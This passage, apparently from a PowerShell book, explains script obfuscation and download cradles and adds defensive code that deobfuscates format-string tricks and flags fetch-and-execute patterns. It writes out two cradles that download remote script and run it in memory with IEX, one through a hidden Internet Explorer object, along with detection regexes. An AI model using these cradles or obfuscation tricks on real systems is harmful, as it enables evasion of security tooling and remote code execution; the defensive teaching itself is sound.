Obfuscation

Obfuscation is a technique that makes code unreadable in order to evade logging and detection mechanisms, while preserving its functionality. The problem with most antivirus scanners is that they still rely mainly on signature (definition) files. In scripting languages, this kind of detection is easy to bypass by obfuscating the script and executing the code in a different manner.

A great project to create your own obfuscated scripts is Invoke-Obfuscation, written by Daniel Bohannon: 

https://github.com/danielbohannon/Invoke-Obfuscation

Take a look at the following line of code:

#Obfuscated script
.("{3}{1}{2}{0}" -f 'Host','ri','te-','W') ("{2}{1}{0}{8}{5}{9}{6}{4}{7}{3}" -f 'hell','owerS','P','uage','tic ','a fan','s','lang',' is ','ta')

As you can see, it is very hard to identify the real purpose of this code. It starts with the dot-sourcing operator (.), which invokes the command that the first parenthesized expression evaluates to. We remove it first so that we can split the obfuscated script into its two parts:

#removing dot sourcing mechanism
#first part of the script
"{3}{1}{2}{0}" -f 'Host','ri','te-','W' #Write-Host

#last part of the script
"{2}{1}{0}{8}{5}{9}{6}{4}{7}{3}" -f 'hell','owerS','P','uage','tic ','a fan','s','lang',' is ','ta' #"PowerShell is a fantastic language"

In this example, the hidden PowerShell code was Write-Host "PowerShell is a fantastic language", which is harmless. But it is also possible to dynamically load content from the internet and execute it directly from memory. For this purpose, so-called download cradles are used: short snippets that download code from the internet and execute it. In these cradles, we frequently see the .NET System.Net.WebClient class being used to retrieve the script, and Invoke-Expression (alias iex) to finally execute it.
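The manual unwrapping above can be automated. The following function is an added example (it is not code from the book or from Invoke-Obfuscation, and the function and variable names are my own). It uses the PowerShell parser's own AST instead of regular expressions: every "-f" expression whose format string and argument list are all string constants is evaluated statically and written back as a literal, and every command invoked through the dot-source (.) or call (&) operator with a computed name is reported. Arguments that come from variables or sub-expressions are left alone, because they cannot be resolved without running the code.

```powershell
# Added example, not from the book: static resolution of "-f" string-format
# obfuscation plus detection of dynamically named commands, via the PowerShell AST.
using namespace System.Management.Automation.Language

function Resolve-FormatObfuscation {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$ScriptText)

    $tokens = $null; $errors = $null
    $ast = [Parser]::ParseInput($ScriptText, [ref]$tokens, [ref]$errors)
    if ($errors.Count -gt 0) {
        throw "Script does not parse: $(($errors | ForEach-Object Message) -join '; ')"
    }

    # 1. Every '<format string> -f <args>' where both sides are string constants.
    $formatNodes = $ast.FindAll({
        param($n)
        $n -is [BinaryExpressionAst] -and $n.Operator -eq [TokenKind]::Format
    }, $true)

    $rewrites = foreach ($node in $formatNodes) {
        if ($node.Left -isnot [StringConstantExpressionAst]) { continue }
        $argNodes = if ($node.Right -is [ArrayLiteralAst]) { $node.Right.Elements }
                    else { @($node.Right) }
        # Variables, sub-expressions or (...) on the right side: cannot resolve statically
        if ($argNodes | Where-Object { $_ -isnot [StringConstantExpressionAst] }) { continue }

        $values = [object[]]@($argNodes | ForEach-Object Value)
        [pscustomobject]@{
            Start    = $node.Extent.StartOffset   # character offsets into $ScriptText
            End      = $node.Extent.EndOffset
            Original = $node.Extent.Text
            Resolved = $node.Left.Value -f $values
        }
    }

    # 2. Rewrite from the end of the text backwards so earlier offsets stay valid.
    #    Resolved strings are re-emitted as single-quoted literals for reading,
    #    not for re-execution.
    $sb = [System.Text.StringBuilder]::new($ScriptText)
    foreach ($r in ($rewrites | Sort-Object Start -Descending)) {
        $literal = "'" + ($r.Resolved -replace "'", "''") + "'"
        [void]$sb.Remove($r.Start, $r.End - $r.Start).Insert($r.Start, $literal)
    }

    # 3. Commands run through '.' or '&' whose first element is not a plain literal:
    #    the command name is computed at run time, a classic obfuscation tell.
    $dynamicCalls = $ast.FindAll({
        param($n)
        $n -is [CommandAst] -and
        $n.InvocationOperator -ne [TokenKind]::Unknown -and
        $n.CommandElements[0] -isnot [StringConstantExpressionAst]
    }, $true)

    [pscustomobject]@{
        Deobfuscated    = $sb.ToString()
        FormatRewrites  = @($rewrites)
        DynamicCommands = @($dynamicCalls | ForEach-Object { $_.Extent.Text })
    }
}

# The book's sample line, embedded here as the input.
$sample = @'
.("{3}{1}{2}{0}" -f 'Host','ri','te-','W') ("{2}{1}{0}{8}{5}{9}{6}{4}{7}{3}" -f 'hell','owerS','P','uage','tic ','a fan','s','lang',' is ','ta')
'@
$result = Resolve-FormatObfuscation -ScriptText $sample
$result.Deobfuscated
$result.FormatRewrites | Format-Table Original, Resolved -AutoSize
$result.DynamicCommands
```

Running this on the sample turns both parenthesized expressions into their plain string literals and reports the whole line as a dynamically named command, because its name is produced by an expression rather than written out. Working on the AST rather than on text also means the same resolver handles whitespace, casing and backtick tricks that a regular expression would have to enumerate one by one.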

To see how complicated this can easily get, take a look at the Invoke-CradleCrafter project:

https://github.com/danielbohannon/Invoke-CradleCrafter

It starts with typical examples seen in the wild:

# typical download cradle
IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/ddneves/Book_Learn_PowerShell/master/Ch1/RetrieveVersion.ps1")

It then goes up to more complex variations:

# Starting an IE COMObject hidden - downloading and executing the content
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate("https://raw.githubusercontent.com/ddneves/Book_Learn_PowerShell/master/Ch1/RetrieveVersion.ps1");start-sleep -s 3;$r=$ie.Document.body.innerText;$ie.quit();IEX $r
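Both cradles above consist of the same two halves: a fetch of remote content (WebClient or a hidden Internet Explorer COM object) and an in-memory execution primitive (IEX). The following function is an added example, not code from the book or from Invoke-CradleCrafter: it scores a piece of script text for those two halves separately and only calls it a cradle when both are present. The indicator regexes, the benign sample and the placeholder URL example.invalid are constructed here for illustration; the list is deliberately small and is a starting point, not a complete signature set.

```powershell
# Added example, not from the book: flag download cradles by requiring both a
# remote-fetch primitive and an in-memory execution primitive in the same script.
function Find-DownloadCradleIndicators {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$ScriptText)

    # -match is case-insensitive by default, so "iex"/"IEX" and
    # "Net.Webclient"/"Net.WebClient" all hit.
    $fetch = [ordered]@{
        'WebClient'  = 'Net\.WebClient|\.Download(String|File|Data)\('
        'WebRequest' = 'Invoke-WebRequest|Invoke-RestMethod|\b(iwr|irm)\b'
        'COMBrowser' = 'InternetExplorer\.Application|Document\.body\.innerText'
    }
    $execute = [ordered]@{
        'InvokeExpression'  = 'Invoke-Expression|\biex\b'
        'ScriptBlockCreate' = '\[ScriptBlock\]::Create|\bInvoke-Command\b'
    }

    $hits = foreach ($set in @($fetch, $execute)) {
        foreach ($name in $set.Keys) {
            if ($ScriptText -match $set[$name]) { $name }
        }
    }
    $hits = @($hits)
    $hasFetch   = [bool]($hits | Where-Object { $fetch.Contains($_) })
    $hasExecute = [bool]($hits | Where-Object { $execute.Contains($_) })

    $verdict = if ($hasFetch -and $hasExecute) { 'download cradle' }
               elseif ($hasFetch)             { 'download only' }
               elseif ($hasExecute)           { 'dynamic execution only' }
               else                           { 'no indicator' }

    [pscustomobject]@{ Verdict = $verdict; Indicators = $hits; Script = $ScriptText }
}

# Constructed sample script blocks, as they would appear in the ScriptBlockText of
# PowerShell script block log events (event ID 4104). The first two are the cradles
# from the book; the last two are download-only and benign for comparison.
$samples = @(
    'IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/ddneves/Book_Learn_PowerShell/master/Ch1/RetrieveVersion.ps1")'
    '$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate("https://raw.githubusercontent.com/ddneves/Book_Learn_PowerShell/master/Ch1/RetrieveVersion.ps1");start-sleep -s 3;$r=$ie.Document.body.innerText;$ie.quit();IEX $r'
    'Invoke-WebRequest -Uri https://example.invalid/tools.zip -OutFile C:\Temp\tools.zip'
    'Get-ChildItem -Path C:\Logs -Filter *.evtx | Sort-Object LastWriteTime -Descending'
)
$samples | ForEach-Object { Find-DownloadCradleIndicators -ScriptText $_ } |
    Format-Table Verdict, Indicators -AutoSize
```

Requiring both halves keeps an ordinary Invoke-WebRequest with -OutFile from being reported as a cradle. Plain string indicators like these are trivially evaded by the obfuscation shown earlier, which is why they are most useful when run over script block log content rather than over files on disk: the text handed to Invoke-Expression is itself compiled as a new script block when it runs, so it is logged in clear text no matter how the cradle that fetched it was written.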

The problem from a defensive view is that you cannot win this fight with signatures alone: even today, new ways to download and execute code are still being found. This leads us to our next topic: with the logging capabilities, especially script block logging, you will be able to gain insight into the code that was actually executed.
